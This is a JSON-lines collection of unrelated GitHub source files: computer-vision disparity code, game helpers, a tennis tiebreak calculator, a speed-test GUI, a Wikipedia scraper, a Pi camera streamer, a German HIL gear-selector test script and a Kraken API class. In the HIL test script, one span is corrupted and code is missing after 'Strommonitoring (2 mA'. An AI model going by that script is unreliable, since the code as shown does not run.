Otherwise, set it somewhere in the 50-200 range.\n speckleWindowSize = 200\n # Maximum disparity variation within each connected component.\n # If you do speckle filtering, set the parameter to a positive value, it will be implicitly multiplied by 16.\n # Normally, 1 or 2 is good enough.\n speckleRange = 2\n disp12MaxDiff = 0\n\n stereo = cv.StereoSGBM_create(\n minDisparity=min_disp,\n numDisparities=num_disp,\n blockSize=block_size,\n uniquenessRatio=uniquenessRatio,\n speckleWindowSize=speckleWindowSize,\n speckleRange=speckleRange,\n disp12MaxDiff=disp12MaxDiff,\n P1=8 * 1 * block_size * block_size,\n P2=32 * 1 * block_size * block_size,\n )\n disparity_SGBM = stereo.compute(imgL, imgR)\n\n # Normalize the values to a range from 0..255 for a grayscale image\n disparity_SGBM = cv.normalize(disparity_SGBM, disparity_SGBM, alpha=255,\n beta=0, norm_type=cv.NORM_MINMAX)\n disparity_SGBM = np.uint8(disparity_SGBM)\n cv.imshow(\"Disparity of Rectified Imgs\", resize(disparity_SGBM,30))\n cv.imwrite(\"disparity_SGBM_norm_GRID.png\", disparity_SGBM)\n\n def depth_map(self):\n imgL = cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n imgR = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n stereo = cv.StereoBM_create(numDisparities=16,\n blockSize=15) # numDisparities is window size, must be divisible by 16\n\n disparity = stereo.compute(imgL, imgR)\n\n local_max = disparity.max()\n local_min = disparity.min()\n print(\"MAX \" + str(local_max))\n print(\"MIN \" + str(local_min))\n disparity_visual = (disparity - local_min) * (1.0 / (local_max - local_min))\n\n\n\n plt.imshow(disparity_visual, 'gray')\n plt.title(\"Depth map\")\n plt.show()","repo_name":"linnea-evanson/ComputerVisionCW","sub_path":"CVPR_CW1/threeD_two.py","file_name":"threeD_two.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70459515882","text":"###############################################################################\n# This file contains all the helper functions for gameMode_timerFired\n# Citation 1. 
Sprite sheets Code: \n # TA led mini lecture on images/Pil: \n # https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=249eb6cc-06ee-450b-8d1e-adda0085dd69 \n # 15112 course notes (Animations Part 4)\n # https://www.cs.cmu.edu/~112/notes/notes-animations-part4.html#spritesheetsWithCropping\n # Extend of what I copied: primarily just initImages.\n# Including:\n # checkIfTAChosen \n # sprites (See citation 1 for sprite code)\n # moveBacktrackerGhost\n # moveBacktrackerGhost2\n # alterRowCol\n # checkIfTAOverNode\n # updateHealth\n # checkIfTAOverPowerUp\n###############################################################################\n\nfrom makeMazeStudent import *\nimport copy, time\n\ndef checkIfTAChosen(app):\n if app.ta == 'winston':\n app.taImage = 'images/spriteSheet-trans1.png'\n app.taImage = app.loadImage(app.taImage)\n app.taImage = app.scaleImage(app.taImage, 0.25) \n app.TA.initImages(app.taImage)\n elif app.ta == 'stephanie':\n app.taImage = 'images/spriteSheet-trans2.png'\n app.taImage = app.loadImage(app.taImage)\n app.taImage = app.scaleImage(app.taImage, 0.25) \n app.TA.initImages(app.taImage)\n\n# (See citation 1 for sprite code)\ndef sprites(app):\n # ohq Student sprite counter\n app.ohqStudentSpriteCounter = ( (1 + app.ohqStudentSpriteCounter) \n % len(app.ohqStudentSprites) )\n # ta sprite counter\n if app.isMoving:\n app.TA.spriteCounter = (app.TA.spriteCounter + 1) % 4\n else:\n app.TA.spriteCounter = 0\n\ndef moveBacktrackerGhost(app):\n # nodesToGo: the next node to go to is at the end of the list. \n # so if we reach a power up, we want to take a step back. we would need to \n # append that node to app.nodesToGo\n # we should keep track of nodes we went to. (app.pastNodes)\n if app.reachedPowerUp == True:\n app.nodesToGo.append(app.lastNode)\n app.nodesToGo.append(app.lastNode)\n app.reachedPowerUp = False\n if app.nodesToGo != []:\n cop = copy.deepcopy(app.nodesToGo) \n if time.time() - app.t1 > 0.5:\n if cop != []:\n start = (app.backtrackerGhostX, app.backtrackerGhostY)\n end = cop[-1]\n #app.pastNodes.append(end)\n app.lastNode = end\n # if going down or up (x is same)\n if start[0] == end[0]:\n h = abs(start[1]-end[1])\n # if going down. \n if end[1] >= start[1]:\n app.backtrackerGhostY += h \n # if going up. \n else: \n app.backtrackerGhostY -= h \n # if going left or right (y is same)\n else: # elif start[1] == end[1]:\n h = abs(start[0]-end[0])\n # if going left. \n if end[0] <= start[0]:\n app.backtrackerGhostX -= h \n # if going right. \n else: \n app.backtrackerGhostX += h \n app.t1 = time.time()\n cop.pop()\n app.nodesToGo = cop\n\ndef moveBacktrackerGhost2(app):\n if app.reachedPowerUp == True:\n app.nodesToGo2.append(app.lastNode)\n app.nodesToGo.append(app.lastNode)\n app.reachedPowerUp = False\n if app.nodesToGo2 != []:\n cop = copy.deepcopy(app.nodesToGo2) \n if time.time() - app.t2 > 0.5:\n if cop != []:\n start = (app.backtrackerGhostX2, app.backtrackerGhostY2)\n end = cop[-1]\n\n # if going down or up (x is same)\n if start[0] == end[0]:\n h = abs(start[1]-end[1])\n # if going down. \n if end[1] >= start[1]:\n app.backtrackerGhostY2 += h \n # if going up. \n else: \n app.backtrackerGhostY2 -= h \n # if going left or right (y is same)\n else: # elif start[1] == end[1]:\n h = abs(start[0]-end[0])\n # if going left. \n if end[0] <= start[0]:\n app.backtrackerGhostX2 -= h \n # if going right. 
\n else: \n app.backtrackerGhostX2 += h \n app.t2 = time.time()\n cop.pop()\n app.nodesToGo2 = cop\n updateHealth(app)\n checkIfTAOverPowerUp(app)\n\ndef alterRowCol(app, row, col): # returns (x, y)\n mazeWidth = app.width - 2*app.margin\n mazeHeight = app.height - 2*app.margin\n cellWidth = mazeWidth / app.rows\n cellHeight = mazeHeight / app.cols\n x = app.margin + row*cellWidth\n y = app.margin + col*cellHeight\n return (x, y)\n \ndef checkIfTAOverNode(app):\n lstOfAllPossibleNodes = []\n mazeWidth = app.width - 2*app.margin\n mazeHeight = app.height - 2*app.margin\n cellWidth = mazeWidth / app.rows\n cellHeight = mazeHeight / app.cols\n for i in range(app.cols):\n for j in range(app.rows):\n nodeX = app.margin + i*cellWidth\n nodeY = app.margin + j*cellHeight\n node = (nodeX, nodeY)\n lstOfAllPossibleNodes.append(node)\n possX = app.margin\n possY = app.margin\n for (nodeX, nodeY) in app.nodesToGo:\n if (possX - 5 <= nodeX <= possX + 5 and \n possY - 5 <= nodeY <= possY + 5):\n app.nodesToGo.remove((nodeX, nodeY))\n break\n for (nodeX, nodeY) in app.nodesToGo2:\n if (possX - 5 <= nodeX <= possX + 5 and \n possY - 5 <= nodeY <= possY + 5):\n app.nodesToGo2.remove((nodeX, nodeY))\n break\n x = 0\n y = 0\n for (nodeX, nodeY) in lstOfAllPossibleNodes:\n if (nodeX - 10 <= app.TA.playerX <= nodeX + 10 and\n nodeY - 10 <= app.TA.playerY <= nodeY + 10):\n # this means the TA is at a node. \n x = nodeX\n y = nodeY\n node = (x, y)\n if node in app.nodesToGo:\n app.nodesToGo.remove(node)\n app.nodesToGo.insert(0, node)\n if node in app.nodesToGo2:\n app.nodesToGo2.remove(node)\n app.nodesToGo2.insert(0, node)\n break\n if x == 0 and y == 0:\n pass\n\ndef updateHealth(app):\n app.drawHealthMessage = False\n # check if TA's location is same as ghost location. (or within 20)\n if (app.backtrackerGhostX - 20 <= app.TA.playerX \n <= app.backtrackerGhostX + 20 and \n app.backtrackerGhostY - 20 <= app.TA.playerY \n <= app.backtrackerGhostY + 20):\n app.health -= 10\n app.drawHealthMessage = True\n\ndef checkIfTAOverPowerUp(app):\n app.drawPowerUpMessage = False\n if (app.TA.playerX - 10 <= app.powerUpX <= app.TA.playerX + 10 and\n app.TA.playerY - 10 <= app.powerUpY <= app.TA.playerY + 10):\n app.drawPowerUp = False # when we reach powerUp. \n app.reachedPowerUp = True\n app.drawPowerUpMessage = True\n # if this is true, the student will automatically go back to where it \n # originally spawned. 
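\n    # (moveBacktrackerGhost and moveBacktrackerGhost2 check app.reachedPowerUp on their next timer\n    # tick and re-append app.lastNode to their node queues, sending each ghost back along its path.)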
","repo_name":"anahitahassan/112-Term-Project","sub_path":"Codebase/timerFiredHelper.py","file_name":"timerFiredHelper.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15299948422","text":"## calculate the probability that the current server wins a best-of-p tiebreak.\n \n## some results shown here:\n## http://summerofjeff.wordpress.com/2010/12/04/7-point-tiebreak-win-expectancy-tables/\n \ndef fact(x):\n if x in [0, 1]: return 1\n r = 1\n for a in range(1, (x+1)): r = r*a\n return r\n \ndef ch(a, b):\n return fact(a)/(fact(b)*fact(a-b))\n \ndef tiebreakProb(s, t, v=0, w=0, p=7):\n ## calculate the probability that the current server wins a best-of-p tiebreak.\n ## s = p(server wins service point)\n ## t = p(current server wins return point)\n ## v, w = current score\n ## check if tiebreak is already over:\n if v >= p and (v-w) >= 2:\n return 1\n elif w >= p and (w-v) >= 2:\n return 0\n else: pass\n ## re-adjust so that point score is not higher than p;\n ## e.g., if p=7 and score is 8-8, adjust to 6-6, which\n ## is logically equivalent\n while True:\n if (v+w) > 2*(p-1):\n v -= 1\n w -= 1\n else: break\n outcomes = {} ## track probability of each possible score\n ## this is messy and probably not optimal, figuring out\n ## how many points remain, and how many are on each\n ## player's serve:\n for i in range((p-1)):\n remain = p + i - v - w\n if remain < 1: continue\n else: pass\n if remain % 2 == 1: \n if (v+w) % 2 == 0: ## sr[rs[sr\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain-1)/2\n ret = (remain+1)/2\n else: ## ss[rr[ss[\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain+1)/2\n ret = (remain-1)/2 \n else:\n if (v+w) % 2 == 0: ## sr[rs[sr\n svc, ret = remain/2, remain/2\n else: ## ss[rr[ss[\n svc, ret = (remain-2)/2, (remain-2)/2\n if remain % 4 == 0:\n svc += 1\n ret += 1\n else:\n svc += 2\n ## who serves the last point?\n if (v+w) % 2 == 0:\n## if remain in [1, 4, 5, 8, 9, 12, 13, 16, 17, 20, 21]: ## pattern: remain % 4 in [0, 1]\n if (remain % 4) in [0, 1]:\n final = s\n svc -= 1\n else:\n final = t\n ret -= 1\n else:\n## if remain in [3, 4, 7, 8, 11, 12, 15, 16, 19, 20]:\n if (remain%4) in [3, 0]:\n final = t\n ret -= 1\n else:\n final = s\n svc -= 1\n pOutcome = 0\n for j in range(svc+1):\n for k in range(ret+1):\n if (j+k) == (p - 1 - v):\n m = svc - j\n n = ret - k\n pr = (s**j)*(t**k)*((1-s)**m)*((1-t)**n)*ch(svc,j)*ch(ret,k)*final\n pOutcome += pr\n else: continue\n key = str(p) + str(i)\n outcomes[key] = pOutcome\n if remain % 2 == 1: \n if (v+w) % 2 == 0: ## sr[rs[sr\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain-1)/2\n ret = (remain+1)/2\n else: ## ss[rr[ss[\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain+1)/2\n ret = (remain-1)/2 \n else:\n if (v+w) % 2 == 0: ## sr[rs[sr\n svc, ret = remain/2, remain/2\n else: ## ss[rr[ss[\n svc, ret = (remain-2)/2, (remain-2)/2\n if remain % 4 == 0:\n svc += 1\n ret += 1\n else:\n svc += 2\n ## probability of getting to (p-1)-(p-1) (e.g. 
6-6)\n final = 1\n x = 0\n for j in range(svc+1):\n for k in range(ret+1):\n if (j+k) == (p - 1 - v):\n m = svc - j\n n = ret - k\n pr = (s**j)*(t**k)*((1-s)**m)*((1-t)**n)*ch(svc,j)*ch(ret,k)*final\n x += pr\n else: continue\n outcomes['+'] = (x*s*t)/((s*t) + (1-s)*(1-t))\n ## add up all positive outcomes\n wtb = 0\n for z in outcomes:\n wtb += outcomes[z]\n return wtb\n","repo_name":"JeffSackmann/tennis_misc","sub_path":"tennisTiebreakProbability.py","file_name":"tennisTiebreakProbability.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"3479789834","text":"from tkinter import *\nimport speedtest\n\ndef speedCheck():\n sp = speedtest.Speedtest()\n sp.get_servers()\n down = str(round(sp.download()/(10**6),3)) + \"Mbps\"\n up = str(round(sp.upload()/(10**6),3)) + \"Mbps\"\n lab_down.config(text=down)\n lab_up.config(text=up)\n\nsp = Tk()\nsp.title(\"SpeedTest\")\nsp.geometry(\"500x500\")\nsp.config(bg= \"light grey\")\nlab = Label(sp, text=\"Internet Speed Test\")\nlab.place(x=40, y=40, width=200)\n\nlab = Label(sp, text=\"Downloading Speed\", fg=\"blue\")\nlab.place(x=40, y=90, width=200)\n\nlab_down = Label(sp, text=\"00\")\nlab_down.place(x=40, y=140, width=200)\n\nlab = Label(sp, text=\"Uploading Speed\")\nlab.place(x=40, y=190, width=200)\n\nlab_up = Label(sp, text=\"00\")\nlab_up.place(x=40, y=240, width=200)\n\nbutton = Button(sp,text=\"CHECK SPEED\", relief=RAISED, command=speedCheck)\nbutton.place(x=40, y=290, width=200)\n\n\nsp.mainloop() ","repo_name":"surbhiahuja/Python","sub_path":"SpeedTest.py","file_name":"SpeedTest.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18855001215","text":"#!/usr/bin/env python\n\nimport sys\nimport re\nimport time\nimport json\nimport sqlite3\nimport datetime\nimport wikipediaapi\n\n\n### Parameters\nTHROTTLE_TIME = 0.5\nDEFAULT_ARTICLE_LIST = 'level_4_titles.txt' # default to short list of titles\nDB_FILE = 'briki.db'\nARTICLE_TABLE = 'articles'\n\n\n# Functions\n\n# Use a regular expression to add a space after every period that's\n# followed by a non-space character or a non-digit character\ndef clean_summary(text):\n return re.sub(r'\\.(?=[^\\s\\d])', '. 
', text)\n\n# Remove extra white space in string.\ndef remove_extra_spaces(string):\n return re.sub(r\"\\s+\", \" \", string)\n\n# Take a string with newline characters and return a list of paragraphs.\ndef split_into_paragraphs(string):\n return string.split(\"\\n\")\n\ndef pull_article(title):\n # Check to see if the title is already in the articles table\n # TODO: Also check date_update to see if it is out of date\n cursor.execute('SELECT * FROM articles WHERE title=?', (title,))\n row = cursor.fetchone()\n\n if row is None: # We don't have this one yet.\n print(\"Pulling %s into to database...\" % title)\n try:\n # grab page from Wikipedia\n time.sleep(THROTTLE_TIME)\n page = wiki.page(title)\n contents = clean_summary(page.summary)\n\n # Get the current data and time\n date_update = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Get links to other pages in the 'See also' section, if it exists\n sections = page.sections\n see_also_text = ''\n for s in sections:\n if s.title == 'See also':\n see_also_text = s.text\n break\n see_also = split_into_paragraphs(see_also_text)\n see_also_json = json.dumps(see_also)\n\n # Insert the title, date_update, contents, see_also, and see_from into the articles table\n cursor.execute('''\n INSERT INTO articles(title, date_update, contents, see_also)\n VALUES(?, ?, ?, ?)''', (title, date_update, contents, see_also_json))\n conn.commit()\n except Exception as e:\n print(\"*** Error pulling %s: %s\" % (title, e))\n else:\n print(\"Skipping %s since it's already in the database.\" % title)\n\n\n### Main\n\n# Command line handling \nif len(sys.argv) < 2:\n filename = DEFAULT_ARTICLE_LIST\nelse:\n filename = sys.argv[1]\n\n# Connect to SQLite database\nconn = sqlite3.connect(DB_FILE)\ncursor = conn.cursor()\n\n# Check to see if articles table exists and if it doesn't create it...\n# TODO: Rename see_also to refs_in\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS articles(\n id INTEGER PRIMARY KEY,\n title TEXT NOT NULL,\n date_update TEXT,\n contents TEXT,\n see_also TEXT)\n''')\n \n# Read each line of dict_test into an array\nwith open(filename) as f:\n dict = f.readlines()\n\n# Run through all titles and pull the contents from Wikipedia\nwiki = wikipediaapi.Wikipedia('en')\nfor the_title in dict:\n # Remove the newline character from the end of the title\n the_title = the_title.rstrip('\\n')\n\n # Add the title to the articles table\n pull_article(the_title)\n \n# Close the database\nconn.close()\n","repo_name":"jonbirge/briki","sub_path":"pull_wiki_articles.py","file_name":"pull_wiki_articles.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"32616123848","text":"from picamera import PiCamera\nfrom time import sleep\nimport io\nimport socket\nimport struct\nimport time\nimport picamera\nfrom PIL import Image\n# from adafruit_st7735r import ST7735R\n# import adafruit_imageload\n\nPORT = 5029 # Port to listen on (non-privileged ports are > 1023)\nHOST = ''\n\ncamera = PiCamera()\n\n# Reference for sending stream: https://picamera.readthedocs.io/en/release-1.10/recipes1.html\ndef captureStreamPIL():\n stream = io.BytesIO()\n camera.capture(stream, format='bmp') # capture the image and store in stream as bmp\n stream.seek(0) # start at beginning of stream\n image = Image.open(stream) # read the contents of the stream and store in PIL Image\n\n # Convert to byte array\n imgByteArr = io.BytesIO()\n image.save(imgByteArr, format='bmp')\n 
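# getvalue() below hands back the whole frame as one uncompressed BMP byte string; capturing with\n    # format='jpeg' instead would presumably shrink each frame at some quality cost.\n    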
imgByteArrToReturn = imgByteArr.getvalue()\n\n # Return to byte array to send\n return imgByteArrToReturn\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n (conn, addr) = s.accept()\n print(\"Connected\")\n camera.start_preview()\n # Camera warm-up time\n time.sleep(2)\n while True:\n img = captureStreamPIL()\n conn.send(img)\n\n camera.stop_preview()\n s.close()\n\n\n\n","repo_name":"andreakshao/Line-Following-Robot-CPEN291","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34766197977","text":"from _automation_wrapper_ import TestEnv\nfrom ttk_checks import basic_tests\nimport functions_gearselection\nfrom functions_nm import _checkStatus\nimport functions_common\nimport functions_nm\nimport time\nfrom time import time as t\n\n# Instantiate test environment\ntestenv = TestEnv()\n\ntry:\n # #########################################################################\n # Testenv #################################################################\n testenv.setup()\n testresult = testenv.getResults()\n\n # Initialize functions ####################################################\n hil = testenv.getHil()\n daq = testenv.getGammaDAQ()\n func_gs = functions_gearselection.FunctionsGearSelection(testenv, hil)\n func_com = functions_common.FunctionsCommon(testenv)\n func_nm = functions_nm.FunctionsNM(testenv)\n\n # Initialize variables ####################################################\n test_variable = hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value\n test_variable.alias = \"Waehlhebel_04:WH_Zustand_N_Haltephase_2\"\n\n # set Testcase ID #########################################################\n testresult.setTestcaseId(\"TestSpec_116\")\n\n # TEST PRE CONDITIONS #####################################################\n testresult.append([\"[#0] Test Vorbedingungen\", \"\"])\n testresult.append([\"[+] Starte ECU (KL30 an, KL15 an)\", \"\"])\n testenv.startupECU()\n testresult.append([\"[.]Initialisierungsphase abgeschlossen und Waehlhebelposition D aktiviert\", \"\"])\n descr, verdict = func_gs.changeDrivePosition('D')\n testresult.append([\"\\xa0\" + descr, verdict])\n\n # TEST PROCESS ############################################################\n testresult.append([\" Starte Testprozess: %s\" % testenv.script_name.split('.py')[0], \"\"])\n\n # test step 1\n testresult.append([\"\\x0a1. 
Lese Signal Waehlhebel_04:WH_Zustand_N_Haltephase_2\", \"\"])\n testresult.append([\" Prüfe WH_Zustand_N_Haltephase_2 = 0\", \"\"])\n testresult.append(\n basic_tests.checkStatus(\n current_status=hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value,\n nominal_status=0,\n descr=\"Prüfe, dass Wert 0 ist\",\n )\n )\n\n # test step 2\n testresult.append([\"\\x0a2 Setze SiShift_FlgStrtNeutHldPha = 1,VDSO_Vx3d = 32766 (0 km/h),SIShift_StLghtDrvPosn = 6, und Kl15 aus \", \"\"])\n hil.SiShift_01__SIShift_FlgStrtNeutHldPha__value.set(1)\n\n descr, verdict = func_gs.setVelocity_kmph(0)\n testresult.append([\"\\xa0\" + descr, verdict])\n\n descr, verdict = func_gs.changeDrivePosition('N')\n testresult.append([\"\\xa0\" + descr, verdict])\n\n testresult.append([\"Setze KL15 auf 0 (inactive) und 150ms warten\", \"INFO\"])\n hil.cl15_on__.set(0)\n time.sleep(0.15)\n\n testresult.append([\"\\x0a2.1 Schalte Senden von RX Signalen (HiL --> ECU) aus\", \"\"])\n func_nm.hil_ecu_tx_off_state(\"aus\")\n\n testresult.append([\"\\x0aPrüfe WH_Zustand_N_Haltephase_2 = 1 \", \"INFO\"])\n testresult.append(\n basic_tests.checkStatus(\n current_status=hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value,\n nominal_status=1,\n descr=\"Prüfe, dass Wert 1 ist\",\n )\n )\n\n # test step 3\n testresult.append([\"\\x0a3.1 min warten...nach 1 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe, Kein Senden und Empfangen von Botschaften (WH im lokalen Nachlauf\", \"\"])\n time_1 = time.time()\n descr, verdict = func_gs.checkBusruhe(daq, 1)\n testresult.append([descr, verdict])\n\n time_2 = time.time()\n time_difference = time_2 - time_1\n\n testresult.append([\"Prüfe Strommonitoring (2 mA t():\n curr_timestamp = nm_timestamp.get()\n if start_timestamp != curr_timestamp:\n testresult.append(\n [\"\\xa0 WH starts sending the message after %sec\" % (curr_timestamp - start_timestamp), \"PASSED\"])\n WH_Sends_data = True\n break\n elif t_out > t() == False:\n testresult.append(\n [\"\\xa0 WH not sending the message \", \"FAILED\"])\n break\n\n if WH_Sends_data == False:\n testresult.append([\"\\xa0 WH sendet keine Botschaften nach 25 min \", \"FAILED\"])\n\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer1 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1,\n descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1,\n descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n # func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [1], [],\n # descr=\"NM_Waehlhebel_FCAB:12_GearSelector\"),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, 1,\n descr=\"NM_Waehlhebel_NM_aktiv_Tmin:Mindestaktivzeit\"),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, 0,\n descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv\")\n ]\n\n testresult += [\n func_nm.checkNMFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [10, 11], [],\n descr=\"Prüfe NM_Waehlhebel_FCAB:10_Powertrain, NM_Waehlhebel_FCAB:11_Chassis == 1, andere sind 0\"),\n ]\n\n # test step 6\n testresult.append([\"\\x0a6. 
Schalte Senden von RX Signalen (HiL -->ECU) und Sende VDSO_Vx3d = 32838 (1,008 km/h)\", \"\"])\n func_nm.hil_ecu_tx_off_state(\"an\")\n descr, verdict = func_gs.setVelocity_kmph(1.008, True) # changed the velocity timer from 0.04ms to forever\n testresult.append([descr, verdict])\n\n # test step 7\n testresult.append([\"\\x0a7. 1 min warten...nach 26 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer2 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1,\n descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n # func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [1], [],\n # descr=\"NM_Waehlhebel_FCAB:12_GearSelector\"),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1,\n descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, nominal_status=0,\n descr=\"NM_Waehlhebel_NM_aktiv_Tmin:inaktiv\", ticket_id='Fehler Id:EGA-PRM-15'),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, 0,\n descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv\")\n ]\n\n testresult += [\n func_nm.checkNMFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [10, 11], [],\n descr=\"Prüfe NM_Waehlhebel_FCAB:10_Powertrain, NM_Waehlhebel_FCAB:11_Chassis == 1, andere sind 0\"),\n ]\n\n # test step 8\n testresult.append([\"\\x0a8. VDSO_Vx3d = 32766 senden\", \"\"])\n descr, verdict = func_gs.setVelocity_kmph(0)\n testresult.append([\"\\xa0\" + descr, verdict])\n time.sleep(0.025)\n\n # test step 9\n testresult.append([\"\\x0a9. 1 min warten...nach 27 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer2 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1, descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n # basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value, 0, descr=\"NM_Waehlhebel_FCAB: Init\"),\n func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [], [1], descr=\"NM_Waehlhebel_FCAB:CAR wakeup = 0\", ticket_id='Fehler-Id: EGA-PRM-232'),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1, descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, nominal_status=0, descr=\"NM_Waehlhebel_NM_aktiv_Tmin:inaktiv\", ticket_id='Fehler Id:EGA-PRM-15'),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, nominal_status=0, descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv ist\", ticket_id='Fehler Id:EGA-PRM-15')\n ]\n\n # TEST POST CONDITIONS ####################################################\n testresult.append([\"[-] Test Nachbedingungen\", \"\"])\n testresult.append([\"[+] ECU ausschalten\", \"\"])\n testenv.shutdownECU()\n\n # cleanup #################################################################\n # hil = None\n\nfinally:\n # #########################################################################\n testenv.breakdown()\n del 
(testenv)\n","repo_name":"mdabdulkarim04/Wahlhebel","sub_path":"Python/TestPool/N_HaltePhase/Verlaengerung_N_Haltephase_Timer2.py","file_name":"Verlaengerung_N_Haltephase_Timer2.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17466546954","text":"from krakenbot.api import api_client\nfrom krakenbot.constants import ROUND_PRECISION\n\n\nclass Spread:\n def __init__(self, pair):\n self.pair = pair\n self.fetch_spread()\n\n def fetch_spread(self):\n response = api_client.query_public('Spread', {'pair': '{}{}'.format(self.pair.crypto, self.pair.fiat)})\n self.spread = response['result'][str(self.pair)]\n\n @property\n def last_average(self):\n last_spread = self.spread[-1]\n spread_min = round(float(last_spread[1]), ROUND_PRECISION)\n spread_max = round(float(last_spread[2]), ROUND_PRECISION)\n average = (spread_min + spread_max) / 2 # average value (min+max)/2\n return average\n","repo_name":"rocambolesque/krakenbot","sub_path":"krakenbot/models/spread.py","file_name":"spread.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4030459732","text":"import random\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\n\ndef seed_all(seed):\n random.seed(seed) # python random generator\n np.random.seed(seed) # numpy random generator\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef draw_scalar_field2D(arr, vmin=None, vmax=None, cmap=None):\n multi = max(arr.shape[0] // 512, 1)\n fig, ax = plt.subplots(figsize=(5 * multi, 5 * multi))\n cax1 = ax.matshow(arr, vmin=vmin, vmax=vmax, cmap=cmap)\n fig.colorbar(cax1, ax=ax, fraction=0.046, pad=0.04)\n fig.tight_layout()\n return fig\n","repo_name":"Sin3DM/Sin3DM","sub_path":"src/utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"19"} +{"seq_id":"25272499246","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n'''\n数据库 - SQLite\n'''\n\nimport sqlite3, os\n\ndatabase = 'test.db'\n\ndef writeDataToDB(id, name):\n\n # 连接到SQLite数据库\n # 数据库文件是test.db\n # 如果文件不存在,会自动在当前目录创建:\n conn = sqlite3.connect(database)\n\n # 创建一个Cursor:\n cursor = conn.cursor()\n\n # 